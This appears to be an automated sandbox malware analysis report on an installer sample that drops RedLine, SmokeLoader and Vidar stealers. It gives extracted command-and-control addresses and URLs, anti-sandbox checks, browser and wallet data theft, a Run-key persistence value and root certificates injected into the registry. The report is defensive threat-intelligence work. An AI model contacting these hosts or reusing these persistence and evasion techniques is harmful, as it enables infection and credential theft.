Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
24417s -
max time network
28545s -
platform
windows7_x64 -
resource
win7-ja-20210920 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Extracted
vidar
41.6
933
https://mas.to/@lilocc
-
profile_id
933
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral1/memory/2828-231-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2828-232-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2828-234-0x0000000000418D26-mapping.dmp family_redline behavioral1/memory/2828-233-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/2828-236-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 3 IoCs
resource yara_rule behavioral1/files/0x0006000000012296-104.dat family_socelars behavioral1/files/0x0006000000012296-177.dat family_socelars behavioral1/files/0x0006000000012296-159.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/292-348-0x0000000001F90000-0x0000000002066000-memory.dmp family_vidar behavioral1/memory/292-349-0x0000000000400000-0x00000000004D9000-memory.dmp family_vidar -
resource yara_rule behavioral1/files/0x0006000000012242-70.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-72.dat aspack_v212_v242 behavioral1/files/0x0006000000012242-71.dat aspack_v212_v242 behavioral1/files/0x0007000000012222-73.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-76.dat aspack_v212_v242 behavioral1/files/0x0006000000012252-77.dat aspack_v212_v242 -
Blocklisted process makes network request 7 IoCs
flow pid Process 2 1928 cmd.exe 4 1928 cmd.exe 14 1928 cmd.exe 16 1928 cmd.exe 18 1928 cmd.exe 20 1928 cmd.exe 28 1928 cmd.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 1548 setup_installer.exe 1416 setup_install.exe 1088 Mon178e7a516181.exe 1928 cmd.exe 600 Mon17bffc2992eb3d.exe 2040 Mon1708beae021a5ff.exe 1824 Mon17afe24e0084db3.exe 1996 Mon17870faab0.exe 1792 Mon174a6c5f1664f.exe 788 Mon178d8e5d06822.exe 760 Mon17bbf11fdb575d.exe 2068 Mon1708beae021a5ff.exe 960 Mon175e6c8b40064b8c8.exe 2088 Mon17332e41e6b.exe 2104 Mon17a0d8ec302e.exe 2300 Mon17bbf11fdb575d.tmp 2388 DllHost.exe 2524 Mon17bbf11fdb575d.tmp 2792 Mon174a6c5f1664f.exe 2828 Mon174a6c5f1664f.exe 3000 postback.exe 3068 874733.exe 2072 LzmwAqmV.exe 1080 5117413.exe 2060 5880355.exe 2312 2103771.exe 2380 8279270.exe 2700 984612.exe 2752 WinHoster.exe 2624 DownFlSetup110.exe 2816 mshta.exe 1244 6jZhRtW.EXe 292 Soft1WW01.exe 2640 explorer.exe 2480 chrome2.exe 2232 search_hyperfs_206.exe 1196 setup.exe 2508 zhanglijuan-game.exe 1012 default-browser-agent.exe 2264 LYCw0J.ExE 2280 chrome3.exe 2948 regsvr32.exe 2748 193969.exe 2332 kPBhgOaGQk.exe 2420 6902674.exe 1480 7979066.exe 2240 311589.exe 1876 5202903.exe 3032 103796.exe 2980 LzmwAqmV.exe 2592 Mon173a360b525.exe 2812 Mon17afe24e0084db3.exe 3348 conhost.exe 3900 services64.exe 4068 6570899418.exe 2884 sihost64.exe 1140 rectthb 2172 rectthb 1140 rectthb 4016 rectthb 3248 rectthb 644 rectthb 3084 rectthb 2296 rectthb -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6902674.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6902674.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7979066.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7979066.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5117413.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5117413.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 5880355.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 5880355.exe -
Loads dropped DLL 64 IoCs
pid Process 1080 setup_x86_x64_install.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1548 setup_installer.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 1416 setup_install.exe 2012 cmd.exe 908 taskkill.exe 1088 Mon178e7a516181.exe 1088 Mon178e7a516181.exe 1820 cmd.exe 1820 cmd.exe 600 Mon17bffc2992eb3d.exe 600 Mon17bffc2992eb3d.exe 1928 cmd.exe 1928 cmd.exe 112 cmd.exe 1072 cmd.exe 1072 cmd.exe 1152 cmd.exe 1152 cmd.exe 1732 cmd.exe 1868 cmd.exe 2016 cmd.exe 1792 Mon174a6c5f1664f.exe 1792 Mon174a6c5f1664f.exe 1624 conhost.exe 760 Mon17bbf11fdb575d.exe 760 Mon17bbf11fdb575d.exe 1332 cmd.exe 1332 cmd.exe 960 Mon175e6c8b40064b8c8.exe 960 Mon175e6c8b40064b8c8.exe 2104 Mon17a0d8ec302e.exe 2104 Mon17a0d8ec302e.exe 1996 Mon17870faab0.exe 1996 Mon17870faab0.exe 760 Mon17bbf11fdb575d.exe 2300 Mon17bbf11fdb575d.tmp 2300 Mon17bbf11fdb575d.tmp 2300 Mon17bbf11fdb575d.tmp 2300 Mon17bbf11fdb575d.tmp 2388 DllHost.exe 2388 DllHost.exe 2388 DllHost.exe 2524 Mon17bbf11fdb575d.tmp 2524 Mon17bbf11fdb575d.tmp 2524 Mon17bbf11fdb575d.tmp 1792 Mon174a6c5f1664f.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 2724 WerFault.exe 1792 Mon174a6c5f1664f.exe 2828 Mon174a6c5f1664f.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 8279270.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5117413.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5880355.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6902674.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 7979066.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 141 freegeoip.app 143 freegeoip.app 144 freegeoip.app 146 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 1080 5117413.exe 2060 5880355.exe 2420 6902674.exe 1480 7979066.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1792 set thread context of 2828 1792 Mon174a6c5f1664f.exe 71 PID 3348 set thread context of 2640 3348 conhost.exe 174 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Mon17bbf11fdb575d.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-PR4T6.tmp Mon17bbf11fdb575d.tmp File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Mon17bbf11fdb575d.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 4 IoCs
pid pid_target Process procid_target 2692 1928 WerFault.exe 45 2724 1088 WerFault.exe 43 2056 2280 WerFault.exe 109 3116 292 WerFault.exe 96 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rectthb -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3676 schtasks.exe -
Kills process with taskkill 8 IoCs
pid Process 692 taskkill.exe 2660 taskkill.exe 1108 taskkill.exe 3992 taskkill.exe 2972 taskkill.exe 2208 taskkill.exe 908 taskkill.exe 2740 taskkill.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon178d8e5d06822.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mon17332e41e6b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon17332e41e6b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Mon17870faab0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Mon17870faab0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mon178d8e5d06822.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon178d8e5d06822.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
